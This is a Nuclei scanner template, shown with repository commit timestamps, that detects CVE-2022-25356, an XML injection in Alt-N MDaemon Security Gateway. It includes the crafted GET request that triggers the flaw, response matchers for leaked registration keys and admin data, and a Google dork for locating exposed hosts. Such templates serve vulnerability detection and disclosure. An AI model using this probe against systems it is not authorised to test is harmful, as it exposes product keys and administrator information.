nuclei-templates/cves/2022/CVE-2022-25356.yaml

42 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-07 10:49:09 +00:00
id: CVE-2022-25356
info:
name: Alt-N MDaemon Security Gateway - XML Injection
author: Akincibor
severity: medium
description: |
In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
reference:
2022-10-07 12:30:07 +00:00
- https://www.swascan.com/security-advisory-alt-n-security-gateway/
2022-10-07 10:49:09 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-25356
- https://www.altn.com/Products/SecurityGateway-Email-Firewall/
- https://www.swascan.com/security-blog/
2022-10-07 10:49:09 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2022-10-07 10:49:09 +00:00
cve-id: CVE-2022-25356
cwe-id: CWE-91
2022-10-07 10:49:09 +00:00
metadata:
google-dork: inurl:"/SecurityGateway.dll"
verified: "true"
2022-10-07 12:26:06 +00:00
tags: cve,cve2022,altn,gateway,xml,injection
2022-10-07 10:49:09 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Exception: Error while [Loading XML"
- "<RegKey>"
- "<IsAdmin>"
condition: and
- type: status
status:
- 200